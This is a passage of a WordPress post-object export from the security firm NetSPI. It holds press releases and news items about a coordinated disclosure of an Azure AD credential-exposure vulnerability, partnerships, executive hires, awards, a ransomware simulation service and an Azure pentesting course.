“Some Microsoft services incorrectly stored private key data in the (keyCredentials) property while creating applications on behalf of their customers. We have conducted an investigation and have found no evidence of malicious access to this data,” Microsoft says.
The tech giant says it has addressed the bug by preventing Azure services from storing clear text private keys in the keyCredentials property and by preventing users from reading any private key data that has been incorrectly stored in clear text.
“As a result, clear text private key material in the keyCredentials property is inaccessible, mitigating the risks associated with storage of this material in the property,” the company says.
Microsoft also notes that all Automation Run As accounts that have been created using Azure Automation self-signed certificates between October 15, 2020, and October 15, 2021, are affected by the issue. Azure Migrate services and customers who deployed the preview version of VMware to Azure DR experience with Azure Site Recovery (ASR) might also be affected.
Thus, Azure AD customers should cycle through all Automation Account “Run as” certificates to make sure no credentials are exposed.
[post_title] => SecurityWeek: Microsoft Informs Users of High-Severity Vulnerability in Azure AD
[post_excerpt] => On November 18, 2021, NetSPI was featured in an article written by Ionut Arghire for SecurityWeek.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => securityweek-microsoft-informs-users-of-high-severity-vulnerability-in-azure-ad
[to_ping] =>
[pinged] =>
[post_modified] => 2022-12-16 10:51:45
[post_modified_gmt] => 2022-12-16 16:51:45
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=26705
[menu_order] => 220
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[56] => WP_Post Object
(
[ID] => 26697
[post_author] => 91
[post_date] => 2021-11-17 14:11:54
[post_date_gmt] => 2021-11-17 20:11:54
[post_content] =>
The vulnerability, found by NetSPI’s cloud pentesting practice director Karl Fosaaen, affects most organizations that use Azure.
Minneapolis, Minnesota – NetSPI, the leader in enterprise penetration testing and attack surface management, today recognizes the work of practice director Karl Fosaaen who discovered and reported a critical misconfiguration in Microsoft Azure. If exploited by an adversary, CVE-2021-42306: CredManifest would allow bad actors to escalate up to a Contributor role in the Azure Active Directory subscription. If access to the Azure Contributor role is achieved, the user would be able to create, manage, and delete all types of resources in the affected Azure subscription.
Because Azure Active Directory enables employees to sign in and access resources, if the issue was not identified by NetSPI and a malicious individual found the vulnerability first, they would have the potential to access all of the resources in the affected subscriptions. This includes credentials stored in key vaults and any sensitive information stored in Azure services used in the subscription. Or worse, they could disable or delete resources and take entire Azure tenants offline. This would leave organizations without access to external resources that are hosted in the vulnerable subscription, including applications hosted by App services, public files from Storage Accounts, or databases hosted in AzureSQL.
“The scope of this issue is wide-sweeping, given the prominence of “Run as” accounts in Azure and the growing adoption of Azure. We’re proud to have identified and fixed it before the bad guys,” said Fosaaen. “The discovery of this vulnerability highlights the importance of the shared responsibility model among cloud providers and customers. It’s vital for the security community to put the world’s most prominent technologies to the test.”
“We want to thank Karl Fosaaen of NetSPI who reported this vulnerability and worked with the Microsoft Security Response Center (MSRC) under Coordinated Vulnerability Disclosure (CVD) to help keep Microsoft customers safe,” said a representative from MSRC. Impacted Azure services have deployed updates that prevent clear text private key data from being stored during application creation. Additionally, Azure Active Directory deployed an update that prevents access to private key data previously stored. Customers will be notified via Azure Service Health and should perform the mitigation steps specified in the notification to remediate any confirmed impacted Application and/or Service Principal.
Although Microsoft has updated the impacted Azure services, NetSPI recommends cycling any existing Automation Account “Run as” certificates. Because these credentials were potentially exposed, it is best to assume they may have been compromised.
A technical explanation of the vulnerability, how it was found, its impact, and remediation steps, can be found on the NetSPI technical blog. To connect with NetSPI for Azure cloud penetration services, visit NetSPI.com.
Media Contact: Amanda Echavarri, Inkhouse for NetSPI, netspi@inkhouse.com, (978) 201-2510
Dubai, UAE and Minneapolis, Minnesota – SecureLink, the Trusted Risk Advisor and a subsidiary of StarLink, has signed a distribution agreement with NetSPI, a leader in Enterprise Security Testing and Attack Surface Management, for the MEA region.
Pioneers in penetration testing, NetSPI is changing the pentesting landscape to make it easier for enterprises to track trends and improve their vulnerability management programs. Its technical assessments include Web Application Penetration Testing, Mobile Application Penetration Testing, Source Code Review, Infrastructure Vulnerability Assessment, Red Teaming, and Breach and Attack Simulation.
Through this partnership, NetSPI can capitalize on SecureLink’s consultancy, sales, and marketing expertise; use SecureLink’s direct connections with decision-makers across its extensive customer base to create and convert opportunities for NetSPI’s cybersecurity testing services; and take advantage of the years of trust SecureLink has built in the region.
Manish Pardeshi, Director at SecureLink, commented: “We are privileged to onboard NetSPI in our ecosystem that can offer our customers a more continuous and scalable assessment of their environment with NetSPI’s Penetration Testing as a Service (PTaaS) and ensure real-time visibility and full control over the testing program.”
“We are proud to announce our partnership with SecureLink, the well-established cybersecurity leader in the MEA region. Together we will transform the cybersecurity testing industry with NetSPI’s technology-enabled services and expertise,” said Aaron Shilts, President and CEO at NetSPI. “In partnership with SecureLink, multinational enterprises in MEA now have access to NetSPI’s penetration testing and adversary simulation services to test their applications, networks, and cloud at scale and better manage their expanding attack surface. The sophistication, methodology, and value provided by SecureLink and NetSPI is unmatched.”
About SecureLink
SecureLink is a risk advisory firm headquartered in Dubai, UAE, and part of the StarLink Group of companies, which has a turnover of USD 500 Million, over 375 employees, and a presence in 20 countries in the META region, including the UK and USA. SecureLink is an independent advisory firm assisting customers in identifying, mitigating, and managing their business risks. SecureLink provides comprehensive assessment of risks across People, Process & Technology and helps with the right governance frameworks to ensure that risks are continuously monitored and acted upon. SecureLink offers these services via its partner community to develop frameworks and implement platforms for automation of governance, risk, and compliance requirements. For more information about SecureLink, please visit www.securelinkme.net.
[post_title] => SecureLink and NetSPI partner to enable enterprises to manage their attack surface with tech-enabled penetration testing services
[post_excerpt] => Learn about SecureLink and NetSPI's distribution agreement which will provide attack surface management and enterprise pentesting services to the Middle East and Africa (MEA) region.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => securelink-netspi-partnership-penetration-testing-services
[to_ping] =>
[pinged] =>
[post_modified] => 2022-12-16 10:51:47
[post_modified_gmt] => 2022-12-16 16:51:47
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=26594
[menu_order] => 227
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[58] => WP_Post Object
(
[ID] => 26390
[post_author] => 91
[post_date] => 2021-09-14 08:00:00
[post_date_gmt] => 2021-09-14 13:00:00
[post_content] =>
Tel Aviv and Minneapolis, Minnesota – Apiiro, the industry’s first Code Risk Platform™, and NetSPI, the leader in penetration testing and attack surface management, today announced a strategic partnership to combine Apiiro's comprehensive Application Risk Management capabilities with NetSPI’s Penetration Testing as a Service (PTaaS). The partnership enables contextual and risk-based application security testing for its mutual customers.
Organizations rely on penetration testing for releasing and maintaining secure applications. As a result of the partnership, NetSPI customers will be able to test their applications, networks, and cloud infrastructure at scale and manage their attack surfaces using risk visibility and context provided by Apiiro. NetSPI’s PTaaS will be supported by Apiiro’s comprehensive view of security and compliance risks and keen understanding of how to manage the complexities of a risk-based Secure Software Development Lifecycle (SSDLC).
To keep pace with the speed of software development today, both companies advocate for running penetration tests in a smart and consistent way. Instead of performing pentests on a set schedule, they should be performed continuously as high risk changes are identified in an environment. Apiiro helps focus pentests on material changes to application and infrastructure code, enabling organizations to target their security processes. Through this contextual approach to application pentesting, customers can better automate the testing process and identify business-critical security vulnerabilities.
“Apiiro is pleased to be joining forces with NetSPI to provide our customers with next-gen context aware pen-testing capabilities that will reduce the friction between pen-testers and development teams and help deliver secure products faster,” said Idan Plotnik, CEO at Apiiro. “We were impressed by NetSPI’s ability to swiftly identify areas of critical vulnerabilities, and deliver high quality results that allow their customers to have peace of mind and focus on their business priorities.”
“Applications are the lifeblood of organizations today. As application development accelerates, the way we approach security testing needs to evolve,” said Aaron Shilts, President and CEO at NetSPI. “NetSPI and Apiiro are changing the way security teams approach penetration testing. By providing real-time visibility into application attack surface changes, we can better enable continuous and contextual testing to help clients find, fix, and remediate their vulnerabilities faster.”
About Apiiro
Apiiro is the industry's first Code Risk Platform™ to provide Application Risk Management with every change, from design to code to cloud. Apiiro is re-inventing the secure development lifecycle for Agile and cloud-native development and gives organizations a 360° view of security and compliance risks, from design to production, across applications, infrastructure, developers' knowledge, and business impact. Apiiro is backed by Greylock and Kleiner Perkins. www.apiiro.com
[post_title] => Apiiro and NetSPI Partner to Provide Contextual, Risk-Based Penetration Testing
[post_excerpt] => Want contextual, risk-based pentesting? Read about the strategic partnership to combine Apiiro's comprehensive Application Risk Management capabilities with NetSPI’s Penetration Testing as a Service (PTaaS).
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => apiiro-netspi-partnership-contextual-risk-based-penetration-testing
[to_ping] =>
[pinged] =>
[post_modified] => 2022-12-16 10:51:54
[post_modified_gmt] => 2022-12-16 16:51:54
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=26390
[menu_order] => 245
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[59] => WP_Post Object
(
[ID] => 26216
[post_author] => 91
[post_date] => 2021-08-18 08:00:00
[post_date_gmt] => 2021-08-18 13:00:00
[post_content] =>
As CTO, Travis will drive penetration testing, adversary simulation, and attack surface management product strategy to support clients and services teams.
Minneapolis, Minnesota – NetSPI, the leader in enterprise penetration testing and attack surface management, today announced Travis Hoyt as its new Chief Technology Officer (CTO). In his new role, Travis is responsible for enhancing and expanding NetSPI’s technology-enabled services portfolio.
Travis brings over 20 years of cybersecurity leadership experience to NetSPI, previously leading security programs for major financial institutions, including Bank of America and TIAA, where he focused on application security and technology-enabled control transformation. Embracing innovation, he has built and patented two technologies from scratch – a vulnerability assessment and management platform and a posture management solution – well before the market.
“The client perspective and spirit of innovation Travis adds to our team is invaluable to our business and the success of our clients,” said Aaron Shilts, President and CEO at NetSPI. “Travis has a track record of bringing the vision, design, and execution of technologies to life. With his leadership, we are eager to continue disrupting the historically-stagnant pentesting and vulnerability management space.”
“The quality of the NetSPI team and their reputation for innovation is unmatched in the penetration testing industry,” said Travis. “As CTO I’m excited to provide immediate input into the product roadmap and help the team recognize what we need to do to provide the most value to our clients. Looking to the future, I’m eager to start exploring the next generation architecture that will drive the industry forward.”
As a part of a risk-based vulnerability management program, organizations can leverage NetSPI’s risk scoring for industry benchmarking, prioritization of security activities, and more.
Minneapolis, Minnesota – NetSPI, the leader in enterprise penetration testing and attack surface management, today announced the addition of risk scoring to its Resolve™ penetration testing and vulnerability management platform. In conjunction with Penetration Testing as a Service (PTaaS), NetSPI’s risk scoring intelligence helps its clients prioritize, manage, and remediate the vulnerabilities that present the greatest risk to their business.
NetSPI’s new risk scoring capabilities dynamically integrate into PTaaS to provide both a granular vulnerability risk score as well as an aggregate risk score for an organization and its projects, assets, applications, and networks. Risk scoring is only available to NetSPI clients that leverage its penetration testing services.
The risk scores serve as a quantitative metric for risk reduction over time, cybersecurity spend validation, resource allocation, and industry benchmarking. NetSPI’s risk score enables organizations to incorporate business context and the respective threat landscape to accurately prioritize remediation of vulnerabilities.
“There are varying approaches to assigning vulnerability severity, but risk today extends far beyond individual vulnerabilities,” said Jake Reynolds, Head of Product at NetSPI. “The key is to recognize the risks most likely to disrupt the business, identify the threats that would increase those risks, and prioritize the most appropriate mitigations to protect your organization from those threats. NetSPI’s risk scoring does just that.”
According to Gartner[i], organizations with a risk-based vulnerability management program are expected to experience 80% fewer breaches. Download this whitepaper to learn how to use risk scoring to propel your risk-based vulnerability management program forward – and for a detailed overview of NetSPI’s risk score methodology.
“Reactive cybersecurity is a thing of the past. Security leaders must get proactive and take a risk-based approach to stay ahead of today’s adversaries,” said NetSPI President and CEO Aaron Shilts. “Our risk scores enable NetSPI clients to make proactive security decisions based on their unique risk factors. In other words, it allows them to confidently allocate budget and resources to the vulnerabilities that matter most.”
Learn more about PTaaS online here or contact us for a demo of NetSPI’s penetration testing and vulnerability management platform, Resolve™.
On August 5, 2021, NetSPI was named Minne Inno's Blazer Award winner for the High Tech Company category:
After honoring 50 companies as Inno on Fire honorees, Minne Inno — the Business Journal’s news outlet focused on the startup scene — presents this year’s Blazer Award winners. The Blazer winners were selected from the 50 Fire honorees by a panel of judges who chose one company from each category that is lighting its industry on fire.
High Tech Company
NetSPI
NetSPI doubled down on talent and grew its team over the past year.
Earlier this summer, the Minneapolis-based cybersecurity firm added a ransomware attack simulation, in addition to its portfolio of penetration testing services.
“It was a good time for us, because we were already in the middle of disrupting an already stale industry,” Shilts said. “We moved fast, we over communicated, but more than anything, we just focused on taking care of our customers.”
Moving forward, NetSPI has plans to keep disrupting the industry without compromising quality.
“Cyber is still fast moving and very innovative, but when you’re really a disruptor and changing the way people consume a service, that gets everybody excited,” Shilts said.
[post_title] => NetSPI named a Minne Inno Blazer Award winner
[post_excerpt] => On August 5, 2021, NetSPI was named Minne Inno's Blazer Award winner for the High Tech Company category.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => minne-inno-blazer-award-winner
[to_ping] =>
[pinged] =>
[post_modified] => 2022-12-16 10:51:56
[post_modified_gmt] => 2022-12-16 16:51:56
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=26129
[menu_order] => 250
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[62] => WP_Post Object
(
[ID] => 25909
[post_author] => 91
[post_date] => 2021-07-14 13:06:23
[post_date_gmt] => 2021-07-14 18:06:23
[post_content] =>
Celebrating the 35th class of unstoppable entrepreneurs who transform the Heartland Region and beyond.
Minneapolis, Minnesota – Ernst & Young LLP (EY US) announced that NetSPI CEO and President Aaron Shilts was named an Entrepreneur Of The Year® 2021 Heartland Award finalist. Now in its 35th year, the Entrepreneur Of The Year program honors unstoppable business leaders whose ambition, ingenuity and courage in the face of adversity help catapult us from the now to next and beyond.
Shilts was selected by a panel of independent judges. Award winners will be announced during a special virtual celebration on Tuesday, July 27, 2021, becoming lifetime members of an esteemed community of Entrepreneur Of The Year alumni from around the world.
Entrepreneur Of The Year is one of the preeminent competitive award programs for entrepreneurs and leaders of high-growth companies. The nominees are evaluated based on six criteria: entrepreneurial leadership; talent management; degree of difficulty; financial performance; societal impact and building a values-based company; and originality, innovation, and future plans. Since its launch, the program has expanded to recognize business leaders in more than 145 cities in over 60 countries around the world.
“This recognition validates the incredible work our team is doing,” said Shilts. “NetSPI team members operate as entrepreneurs every day and it’s an honor to help lead and support some of the most brilliant people in cybersecurity.”
Regional award winners are eligible for consideration for the Entrepreneur Of The Year National Awards, to be announced in November 2021 at the Strategic Growth Forum®, one of the nation’s most prestigious gatherings of high-growth, market-leading companies. The Entrepreneur Of The Year National Overall Award winner will then move on to compete for the EY World Entrepreneur Of The Year™ Award in June 2022.
Sponsors
Founded and produced by Ernst & Young LLP, the Entrepreneur Of The Year Awards are nationally sponsored by SAP America and The Kauffman Foundation. In the Heartland Region sponsors also include Colliers International, Padilla, PNC Bank, SALO, LLC, and Twin Cities Business.
About Entrepreneur Of The Year®
Entrepreneur Of The Year® is the world’s most prestigious business awards program for unstoppable entrepreneurs. These visionary leaders deliver innovation, growth and prosperity that transform our world. The program engages entrepreneurs with insights and experiences that foster growth. It connects them with their peers to strengthen entrepreneurship around the world. Entrepreneur Of The Year is the first and only truly global awards program of its kind. It celebrates entrepreneurs through regional and national awards programs in more than 145 cities in over 60 countries. National Overall winners go on to compete for the EY World Entrepreneur Of The Year™ title. Visit ey.com/us/eoy
About EY Private
As Advisors to the ambitious™, EY Private professionals possess the experience and passion to support private businesses and their owners in unlocking the full potential of their ambitions. EY Private teams offer distinct insights born from the long EY history of working with business owners and entrepreneurs. These teams support the full spectrum of private enterprises including private capital managers and investors and the portfolio businesses they fund, business owners, family businesses, family offices and entrepreneurs. Visit ey.com/us/private
About EY
EY exists to build a better working world, helping create long-term value for clients, people and society and build trust in the capital markets.
Enabled by data and technology, diverse EY teams in over 150 countries provide trust through assurance and help clients grow, transform, and operate.
Working across assurance, consulting, law, strategy, tax, and transactions, EY teams ask better questions to find new answers for the complex issues facing our world today.
EY refers to the global organization, and may refer to one or more, of the member firms of Ernst & Young Global Limited, each of which is a separate legal entity. Ernst & Young Global Limited, a UK company limited by guarantee, does not provide services to clients. Information about how EY collects and uses personal data and a description of the rights individuals have under data protection legislation are available via ey.com/privacy. EY member firms do not practice law where prohibited by local laws. For more information about our organization, please visit ey.com.
[post_title] => EY US Announces NetSPI CEO Aaron Shilts as an Entrepreneur Of The Year 2021® Heartland Award Finalist
[post_excerpt] => The award celebrates unstoppable entrepreneurs who transform the Heartland Region and beyond.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => entrepreneur-of-the-year-2021-heartland-award-finalist
[to_ping] =>
[pinged] =>
[post_modified] => 2022-12-16 10:51:58
[post_modified_gmt] => 2022-12-16 16:51:58
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=25909
[menu_order] => 257
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[63] => WP_Post Object
(
[ID] => 25827
[post_author] => 91
[post_date] => 2021-07-08 15:00:00
[post_date_gmt] => 2021-07-08 20:00:00
[post_content] =>
Las Vegas, Nevada – NetSPI, the leader in enterprise penetration testing and attack surface management, is attending Black Hat USA 2021 at the Mandalay Bay Convention Center in Las Vegas. This year, the hybrid event will be held in-person and online, featuring cybersecurity trainings, expert-led briefings, networking opportunities, and more. During the conference, the NetSPI team will feature its ransomware attack simulation service and will unveil new, innovative features added to its penetration testing and vulnerability management platform, Resolve™. Connect with NetSPI’s penetration testing and ransomware experts at the Black Hat Business Hall (in-person or virtually) at booth #1579.
Black Hat Business Hall (In-Person and Virtual)
Meet the NetSPI team at booth #1579 to learn more about their expertise in enterprise penetration testing and attack surface management. Get a first look and demo of NetSPI’s new risk scoring feature and learn more about its ransomware attack simulation service. Bonus: Visit the in-person or virtual NetSPI booths for a chance to win a 128 GB Oculus Quest VR headset.
CANCELED: NetSPI Happy Hour at the Mandalay Bay Foundation Room
NetSPI’s August 4 happy hour during Black Hat at the Mandalay Bay Foundation Room has been canceled to limit the spread of the COVID-19 Delta variant, following the latest CDC guidance. The ransomware session will now be available as a webinar on August 17. Register here: How to Build and Validate Ransomware Attack Detections.
When:
Black Hat In-Person: August 4, 2021 | 10am – 6pm PT; August 5, 2021 | 10am – 4pm PT
Black Hat Virtual: August 4, 2021 | 8:30am – 5pm PT; August 5, 2021 | 8:30am – 4pm PT
Where:
Black Hat In-Person Business Hall: Booth #1579, Mandalay Bay Convention Center, Las Vegas, NV
Black Hat Virtual Business Hall: Booth #1579
About NetSPI
NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.
About Black Hat
Founded in 1997, Black Hat is an internationally recognized cybersecurity event series providing the most technical and relevant information security research. Grown from a single annual conference to the most respected information security event series internationally, these multi-day events provide the security community with the latest cutting-edge research, developments, and trends.
[post_title] => NetSPI to Highlight Ransomware Resiliency, Risk-Based Vulnerability Management, and Penetration Testing as a Service During Black Hat 2021
[post_excerpt] => NetSPI attends Black Hat 2021 with a focus on ransomware, vulnerability management, and penetration testing as a service.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => black-hat-usa-2021
[to_ping] =>
[pinged] =>
[post_modified] => 2022-12-16 10:51:59
[post_modified_gmt] => 2022-12-16 16:51:59
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=25827
[menu_order] => 260
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[64] => WP_Post Object
(
[ID] => 25619
[post_author] => 91
[post_date] => 2021-06-18 15:04:22
[post_date_gmt] => 2021-06-18 20:04:22
[post_content] =>
On June 18, 2021, NetSPI was recognized as a 2021 Fire Award winner.
The Fire Awards are always meant to be a celebration of the companies and people that keep Minnesota's tech and startup scene alive.
With this year's fourth annual Fire Awards, we want to celebrate even harder than ever before after one of the most trying years in memory. That's why we have the biggest Fire Awards ever, honoring 50 companies from across the state.
We sourced these Fire winners from our readers and added some companies that have made waves in the past year or are on the precipice of big things. Many companies were honored because of the steps they took to help tackle the Covid-19 pandemic.
In July, a Blazer winner will be selected from each category by a panel of judges. Blazer winners are the hottest companies in each category, deserving some extra recognition. More details about that event will come out later this month.
We've honored companies in a variety of categories. Startup of the Year is the startup that has risen above the rest in the past year, while the Growing Companies category is for those companies that are a bit smaller but show the potential to be a Startup of the Year down the road. We're also honoring the organizations that support our ecosystem with the community builder category, as well as a few specific industries like medical devices and health and wellness.
Let's meet our Fire winners!
High Tech Company:
NetSPI is a Minneapolis-based cybersecurity company that specializes in penetration testing, which is sometimes called ethical hacking. In May, it raised $90 million in venture capital. Its clients include Fortune 500 companies like Medtronic and Microsoft.
Digi Key is an electronics distributor and one of Minnesota's largest private companies. The Thief River Falls-based company helped the University of Minnesota produce the Coventor, a jerry-rigged ventilator that helped address ventilator shortages during the Covid-19 pandemic.
Arctic Wolf is a transplanted unicorn cybersecurity company. Founded in Silicon Valley, it moved to Eden Prairie in 2020 at the same time it announced a $200 million round of venture capital funding at a valuation of over $1 billion.
Lucy, also known as Equals3, is a Minneapolis-based AI firm that helps Fortune 500 clients manage their data. It raised $3 million in June and plans to double its employee base to over 50 by the end of the year.
Carrot Health is a Minneapolis-based firm that collects consumer data for health plans to help them address what are known as the social determinants of health, or environmental factors that affect people's health. It has been experiencing 100% growth since it was founded.
[post_title] => Minne Inno announces the 2021 Fire Awards
[post_excerpt] => On June 18, 2021, NetSPI was recognized as a 2021 Fire Award winner.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => minne-inno-announces-the-2021-fire-awards
[to_ping] =>
[pinged] =>
[post_modified] => 2022-12-16 10:52:01
[post_modified_gmt] => 2022-12-16 16:52:01
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=25619
[menu_order] => 266
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[65] => WP_Post Object
(
[ID] => 25599
[post_author] => 91
[post_date] => 2021-06-17 08:00:00
[post_date_gmt] => 2021-06-17 13:00:00
[post_content] =>
Through the tech-enabled service, organizations can put their ransomware prevention and detection capabilities to the test.
Minneapolis, Minnesota – NetSPI, the leader in enterprise penetration testing and attack surface management, today announced its new ransomware attack simulation service. In collaboration with its ransomware security experts, the new service enables organizations to emulate real world ransomware families to find and fix critical vulnerabilities in their cybersecurity defenses.
Recent ransomware attacks have exposed major cybersecurity gaps globally. In the U.S., the Biden administration is urging business leaders to take immediate steps to prepare for ransomware attacks. In a recent memo, deputy national security advisor for cyber and emerging technology Anne Neuberger recommends organizations, “use a third-party pentester to test the security of your systems and your ability to defend against a sophisticated [ransomware] attack.”
“Paying a ransom doesn’t guarantee your data is returned safely, yet one in four companies worldwide pay the adversaries,” said Scott Sutherland, Practice Director at NetSPI. “Organizations must get more proactive with their security efforts to avoid paying the ransom and funding the cybercriminals. Ransomware families are both opportunistic and targeted – and no industry is exempt from falling victim to an attack.”
“NetSPI is eager to help organizations achieve a more scalable and continuous assessment of their environment from the perspective of an adversary,” said Charles Horton, COO at NetSPI. “The addition of the ransomware attack simulation service to our adversary simulation solutions will further help organizations strengthen their defenses and become more resilient against ransomware attacks.”
During a ransomware attack simulation engagement, NetSPI closely collaborates with organizations to simulate sophisticated ransomware tactics, techniques, and procedures (TTPs) using its custom-built breach and attack simulation technology. Following each engagement, organizations gain access to NetSPI’s technology to run custom plays on their own and continuously evaluate how well their cybersecurity program will hold up to a ransomware attack.
NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ platform and adversary simulation through its Red Team Toolkit. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.
[post_title] => Improve Ransomware Attack Resiliency with NetSPI’s New Ransomware Attack Simulation
[post_excerpt] => Learn how NetSPI's new ransomware attack simulation service enables organizations to find and fix critical vulnerabilities in their ransomware defenses.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => ransomware-attack-resiliency
[to_ping] =>
[pinged] =>
[post_modified] => 2022-12-16 10:52:02
[post_modified_gmt] => 2022-12-16 16:52:02
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=25599
[menu_order] => 267
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[66] => WP_Post Object
(
[ID] => 25593
[post_author] => 91
[post_date] => 2021-06-16 22:48:57
[post_date_gmt] => 2021-06-17 03:48:57
[post_content] =>
Minneapolis, Minnesota – NetSPI, the leader in enterprise penetration testing and attack surface management, has been named one of the Top Workplaces in Minnesota by the Star Tribune. Top Workplaces recognizes the most progressive companies in Minnesota based on employee opinions measuring engagement, organizational health, and satisfaction.
“NetSPI wouldn’t be what it is today without its employees and the culture of innovation that we’ve built,” said NetSPI President and CEO Aaron Shilts. “Even during a turbulent 2020, we had an employee retention rate of 92% which alone speaks volumes in an industry that has zero percent unemployment. I thank each and every member of our team for helping to make NetSPI a Top Workplace.”
The results of the Star Tribune Top Workplaces are based on survey information collected by Energage, an independent company specializing in employee engagement and retention. The analysis includes responses from over 76,000 employees at Minnesota public, private and nonprofit organizations.
“We are especially proud of the fact that our employees called out NetSPI’s top strengths as interdepartmental cooperation, execution, and innovation. This award shows how well our teams work together, which is a key to our success,” said NetSPI Director of People Operations Heather Neumeister. “Seeing the variety of responses throughout the survey really validates the culture we have at NetSPI. Working with great people, doing important work, and having fun came through in many of the comments provided.”
This Top Workplace recognition follows an especially successful 12 months for NetSPI. Recently, NetSPI announced it raised $90 million in growth funding led by KKR, with participation from Ten Eleven Ventures. In 2020, NetSPI acquired Silent Break Security and incorporated its proprietary Adversary Simulation and Red Team Toolkit software into the company’s offensive cyber security and attack surface management offerings. NetSPI also launched Penetration Testing as a Service (PTaaS) in 2020, powered by its Resolve™ platform. 2021 also promises more business opportunities for NetSPI with upcoming additions of risk scoring, vulnerability intelligence, ransomware attack simulation, and more.
To qualify for the Star Tribune Top Workplaces, a company must have more than 50 employees in Minnesota. Nearly 3,000 companies were invited to participate. Rankings were composite scores calculated purely on the basis of employee responses.
About NetSPI
NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest health care companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ platform and adversary simulation through its Red Team Tool Kit. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.
Media Contacts: Elyse Bauchle, Maccabee PR for NetSPI, elyse@maccabee.com, (612) 294-3125
[post_title] => NetSPI Named a 2021 Top Workplace in Minnesota
[post_excerpt] => Learn why NetSPI was named a 2021 top workplace in Minnesota by the Star Tribune.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => top-workplaces-minnesota-2021
[to_ping] =>
[pinged] =>
[post_modified] => 2022-12-16 10:52:02
[post_modified_gmt] => 2022-12-16 16:52:02
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=25593
[menu_order] => 268
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[67] => WP_Post Object
(
[ID] => 25552
[post_author] => 91
[post_date] => 2021-06-10 05:00:00
[post_date_gmt] => 2021-06-10 10:00:00
[post_content] =>
The new training course provides a deep dive on the attack surface introduced by Azure and how to exploit its vulnerabilities.
Minneapolis, Minnesota – NetSPI, the leader in enterprise penetration testing and attack surface management, today announced Dark Side Ops (DSO) 3: Azure Cloud Pentesting, a new cybersecurity training course focused on Azure cloud penetration testing. Participants will gain a better understanding of potential risks associated with Azure cloud deployments, how to exploit them, and how to prevent and remediate critical cloud vulnerabilities.
As experts anticipate cloud adoption to soar in the aftermath of the COVID-19 pandemic, this course helps cybersecurity, DevOps, and IT professionals better grasp the complexities that accompany Microsoft’s Azure cloud platform. The first public DSO 3: Azure Cloud Pentesting training is scheduled for August 23-24, 2021 and will be conducted virtually. The two-day training session costs $2,000/person.
“It’s no surprise that cloud security was listed as the most important skill needed to pursue a cybersecurity career in the latest (ISC)2 Cybersecurity Workforce Study,” said Aaron Shilts, President and CEO at NetSPI. “An emphasis on cloud security education and training is critical as the attack surface grows.”
“Not only does DSO 3: Azure Cloud Pentesting feature a live cloud environment and real-world examples from our extensive cloud penetration testing work, it is also designed and instructed by NetSPI practice director Karl Fosaaen, one of the foremost experts on Azure penetration testing,” Shilts added.
“Traditional network penetration testing processes need to be updated to account for the intricacies introduced by cloud infrastructure,” said Karl Fosaaen, Cloud Practice Director at NetSPI. “Through the training, I’m eager to teach others how to level up their on-premise penetration testing skills and apply them to Azure cloud.”
